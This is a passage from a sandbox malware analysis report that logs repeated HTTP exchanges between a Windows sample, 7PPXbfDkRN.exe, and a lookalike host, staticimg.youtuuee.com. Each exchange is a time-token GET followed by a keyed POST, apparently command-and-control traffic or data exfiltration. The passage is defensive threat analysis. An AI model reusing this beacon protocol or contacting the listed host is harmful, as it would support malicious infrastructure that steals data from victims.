1362 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

16 192.168.2.5 49768 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:33.562303066 CEST

1363 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:33.712238073 CEST

1364 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 32 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 36 72 50 35 42 4d 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150263,"time":1635061593,"rand_str":"6rP5BM"}0

Oct 24, 2021 09:46:33.971893072 CEST

1364 OUT POST /api/?sid=2150263&key=7ead2109b3f290feba66dfab4687cfc7 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 33 of 58

Page 34: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:34.122612000 CEST

1365 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

17 192.168.2.5 49769 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:35.049237013 CEST

1366 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:35.198050976 CEST

1366 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 33 32 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 46 4b 4d 75 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150329,"time":1635061595,"rand_str":"hFKMuq"}0

Oct 24, 2021 09:46:35.355761051 CEST

1366 OUT POST /api/?sid=2150329&key=e265996d76c1500e0649f58ac61c7690 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:35.506477118 CEST

1367 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

18 192.168.2.5 49770 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:36.540766954 CEST

1368 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:36.688316107 CEST

1368 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 33 37 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 75 71 6a 44 47 41 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150371,"time":1635061596,"rand_str":"uqjDGA"}0

Oct 24, 2021 09:46:36.806778908 CEST

1369 OUT POST /api/?sid=2150371&key=814316fb83cc23ea4f6bee56f3d3e033 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 34 of 58

Page 35: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:37.032989025 CEST

1369 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

19 192.168.2.5 49771 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:37.992247105 CEST

1370 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:38.139581919 CEST

1371 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 34 33 31 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 38 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 76 6b 58 49 4b 34 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150431,"time":1635061598,"rand_str":"vkXIK4"}0

Oct 24, 2021 09:46:38.253591061 CEST

1371 OUT POST /api/?sid=2150431&key=8566e456c914f2b7c1956cb023b47cdb HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:38.409102917 CEST

1372 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

2 192.168.2.5 49747 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:13.880568027 CEST

1150 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:14.029927969 CEST

1187 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 34 39 32 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 37 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 52 75 79 63 71 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2149263,"time":1635061573,"rand_str":"5Ruycq"}0

Oct 24, 2021 09:46:14.115669966 CEST

1323 OUT POST /api/?sid=2149263&key=30871ac7c5fca22d591ee3c3e3f7faa8 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 35 of 58

Page 36: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:14.271146059 CEST

1324 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

20 192.168.2.5 49772 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:39.382689953 CEST

1373 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:39.533291101 CEST

1373 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 34 37 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 35 39 39 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 35 52 59 39 64 4b 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150479,"time":1635061599,"rand_str":"5RY9dK"}0

Oct 24, 2021 09:46:39.628333092 CEST

1373 OUT POST /api/?sid=2150479&key=d26e2d32e64af0304786124de837af72 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:39.781892061 CEST

1375 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

21 192.168.2.5 49775 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:40.870773077 CEST

1397 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:41.015261889 CEST

1398 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 35 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 30 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 55 65 36 68 70 67 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150543,"time":1635061600,"rand_str":"Ue6hpg"}0

Oct 24, 2021 09:46:41.125655890 CEST

1398 OUT POST /api/?sid=2150543&key=dc8b6a39192685a24adf63edb72eaa2f HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 36 of 58

Page 37: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:41.280822039 CEST

1399 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

22 192.168.2.5 49776 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:42.144409895 CEST

1400 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:42.296432018 CEST

1400 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 35 39 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 32 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 68 45 47 57 48 4e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150597,"time":1635061602,"rand_str":"hEGWHN"}0

Oct 24, 2021 09:46:42.505656004 CEST

1401 OUT POST /api/?sid=2150597&key=f556d9b1b3eb13930c8eb84fd2c75d69 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:42.660232067 CEST

1401 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

23 192.168.2.5 49777 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:43.287152052 CEST

1402 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:43.442729950 CEST

1402 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 36 34 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 34 42 52 48 64 69 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150643,"time":1635061603,"rand_str":"4BRHdi"}0

Oct 24, 2021 09:46:43.451596975 CEST

1403 OUT POST /api/?sid=2150643&key=00bda22e431ce351ebc677dc0b52b42e HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 37 of 58

Page 38: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:43.604079962 CEST

1404 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

24 192.168.2.5 49778 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:43.910032988 CEST

1404 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:44.059397936 CEST

1405 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 36 37 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 33 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 50 79 37 55 41 32 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150673,"time":1635061603,"rand_str":"Py7UA2"}0

Oct 24, 2021 09:46:44.071578026 CEST

1405 OUT POST /api/?sid=2150673&key=240dac36d4da93b289eb9fc9b1dbf3cf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:44.230175018 CEST

1406 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

25 192.168.2.5 49779 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:44.549891949 CEST

1407 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:44.695611954 CEST

1407 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 30 37 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 34 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 59 42 65 45 33 49 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150707,"time":1635061604,"rand_str":"YBeE3I"}0

Oct 24, 2021 09:46:44.707463980 CEST

1407 OUT POST /api/?sid=2150707&key=ddacdc5d5fb6e792522698a758a1431a HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 38 of 58

Page 39: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:44.859213114 CEST

1408 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

26 192.168.2.5 49780 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:45.172622919 CEST

1409 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:45.318222046 CEST

1409 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 33 35 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 78 6b 67 64 69 70 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150735,"time":1635061605,"rand_str":"xkgdip"}0

Oct 24, 2021 09:46:45.329612017 CEST

1410 OUT POST /api/?sid=2150735&key=141effec60248e2d310c38549aec1135 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:45.483130932 CEST

1410 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

Session ID Source IP Source Port Destination IP Destination Port Process

27 192.168.2.5 49781 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:45.814385891 CEST

1411 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:45.966428995 CEST

1412 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 36 33 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 35 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 36 79 32 74 5a 65 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150763,"time":1635061605,"rand_str":"6y2tZe"}0

Oct 24, 2021 09:46:45.979497910 CEST

1412 OUT POST /api/?sid=2150763&key=48ddd1efffb3f391c22b544a783191cf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Content-Length: 289Host: staticimg.youtuuee.com

Copyright Joe Security LLC 2021 Page 39 of 58

Page 40: Table of Contents 2 Windows Analysis Report 7PPXbfDkRN 3

Oct 24, 2021 09:46:46.131217003 CEST

1413 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"status":3}0

TimestampkBytestransferred Direction Data

Session ID Source IP Source Port Destination IP Destination Port Process

28 192.168.2.5 49782 45.136.151.102 80 C:\Users\user\Desktop\7PPXbfDkRN.exe

TimestampkBytestransferred Direction Data

Oct 24, 2021 09:46:46.451883078 CEST

1414 OUT GET /api/fbtime HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60Host: staticimg.youtuuee.com

Oct 24, 2021 09:46:46.599595070 CEST

1414 IN HTTP/1.1 200 OKServer: nginxDate: Sun, 24 Oct 2021 07:46:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingX-Powered-By: PHP/7.4.21Data Raw: 33 35 0d 0a 7b 22 73 69 64 22 3a 32 31 35 30 37 39 39 2c 22 74 69 6d 65 22 3a 31 36 33 35 30 36 31 36 30 36 2c 22 72 61 6e 64 5f 73 74 72 22 3a 22 42 58 65 64 37 72 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35{"sid":2150799,"time":1635061606,"rand_str":"BXed7r"}0

Oct 24, 2021 09:46:46.608633041 CEST

